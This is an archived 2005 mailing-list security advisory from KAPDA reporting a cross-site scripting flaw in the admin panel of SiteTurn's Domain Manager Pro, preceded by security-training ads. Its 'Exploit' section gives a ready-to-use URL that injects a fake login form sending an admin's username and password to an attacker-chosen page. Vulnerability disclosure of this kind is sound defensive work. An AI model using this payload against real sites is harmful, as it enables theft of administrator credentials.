Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

[KAPDA::#8] Domain Manager Pro Vulnerability

Subject: [KAPDA::#8] Domain Manager Pro Vulnerability
Date: 21 Oct 2005 22:03:54 -0000
[KAPDA::#8] Domain Manager Pro Vulnerability

Domain Manager Pro - Fake form injection

KAPDA New advisory

Vulnerable Products : Domain Manager Pro

Vendor: SiteTurn ,http://www.siteturn.com/

Vulnerability: Fake form injection ( XSS)

Date :
--------------------
2005/08/08
1384/05/17 (Hijri Shamsi)

About Domain Manager Pro:
--------------------
  SiteTurn's custom designed account control solution, for your Linux based 
website.

Domain Manager Pro gives you all of the tools you'll need to manage, grow, and

maintain your website and business to the maximum potential, well into the 
future.

        Vendor`s Description : http://www.siteturn.com/pop/serverSoft/domMan.htm

Disscution:
--------------------
A remote user can conduct cross-site scripting attacks.The 'panel' script does 
not properly

validate user-supplied input at the 'err' parameter.So remote user can inject 
html script to

fake login form and steal admin`s password.

Exploit:
--------------------
http://[target]/admin/panel?err=Please Login Again<br><font color="black"><form 
method="POST"
action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: 
<input name="pass">
<br><input type="Submit" name="subit" value="Login"><noscript>

Solution:
--------------------
Not patched yet by vendor.

More Detail:
--------------------
http://www.kapda.ir/advisory-96.html
Visit above link for more details.

Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [ at } kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)

<Prev in Thread] Current Thread [Next in Thread>
  • [KAPDA::#8] Domain Manager Pro Vulnerability, advisory <=